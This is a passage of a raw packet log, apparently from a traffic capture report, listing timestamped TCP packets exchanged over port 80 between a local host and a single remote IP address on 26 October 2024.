                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981915951 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981926918 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981930971 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981944084 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981951952 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981956959 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981957912 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981964111 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981971979 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.981992006 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982008934 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982034922 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982042074 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982048035 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982053995 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982089043 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982106924 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982166052 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982172966 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982184887 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:18.982214928 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.019886017 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.019956112 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.019962072 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.019968033 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.020016909 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.020045042 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.020051956 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.020097017 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.020261049 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.020329952 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034341097 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034382105 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034388065 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034420013 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034435034 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034461975 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034470081 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034476042 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034516096 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034532070 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034538984 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034544945 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034550905 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034579039 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034585953 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034593105 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034598112 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034599066 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034650087 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034857035 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034863949 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034877062 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034909010 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034915924 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034928083 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034934998 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034945965 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034951925 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034957886 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034976959 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034981966 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.034982920 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035007000 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035018921 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035049915 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035056114 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035059929 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035065889 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035073042 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035101891 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035105944 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035109043 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035125017 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035125017 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035130978 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035155058 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035176039 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035181046 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035208941 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035216093 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035221100 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035252094 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035283089 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035290003 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035300970 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035305977 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035317898 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035326004 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035332918 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035336018 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035360098 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035379887 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035518885 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035526037 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035537004 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035550117 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035556078 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035562038 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035567999 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035595894 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035607100 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035664082 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035670042 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035681963 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035712004 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035733938 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035739899 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035749912 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035758972 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035768986 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035773039 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035778999 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035784006 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035784960 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035800934 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035820961 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035849094 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035860062 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035876989 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035882950 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035893917 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035895109 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035913944 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.035926104 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036020041 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036026001 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036045074 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036051035 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036062002 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036067963 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036067963 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036073923 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036081076 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036091089 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036096096 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036101103 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036107063 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036111116 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036123037 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036138058 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036138058 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036144018 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036150932 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036159039 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036185980 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036220074 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036226988 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036237001 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036242962 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036251068 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036269903 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036282063 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036293983 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036300898 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036300898 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036313057 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036319017 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036344051 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036351919 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036359072 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036364079 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036365032 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036390066 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036412954 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036437988 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036443949 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036456108 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036462069 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036468983 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036485910 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036497116 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036508083 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036511898 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036518097 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036524057 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036534071 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036540985 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036566019 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036590099 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036597013 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036602974 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036612034 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036617994 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036642075 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036670923 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036700010 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036706924 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036712885 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036751032 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036777973 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036784887 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036797047 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036803961 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036825895 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036849022 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036868095 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036874056 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036889076 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036895990 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036900997 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036906958 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036912918 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036921024 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036938906 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036943913 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036950111 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036957979 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036963940 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036968946 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036972046 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036988020 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036992073 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.036992073 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037014961 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037030935 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037117004 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037123919 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037128925 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037134886 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037142038 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037157059 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037157059 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037162066 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037168026 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037173986 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037184954 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037199974 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037211895 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037245989 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037252903 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037265062 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037270069 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037290096 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037306070 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037311077 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037353992 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037379980 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037386894 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037398100 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037405968 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037425995 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037453890 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037453890 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037805080 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.037882090 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058487892 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058547020 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058552980 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058554888 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058566093 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058572054 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058594942 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058609009 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058629036 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058636904 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058674097 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058676958 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058682919 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058690071 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058695078 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058706999 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058721066 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058742046 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058742046 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058768988 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058775902 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058815002 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058819056 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058824062 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058834076 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058840036 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058861017 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058873892 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058881998 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058885098 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.058907032 CEST8054299185.215.113.84192.168.2.8
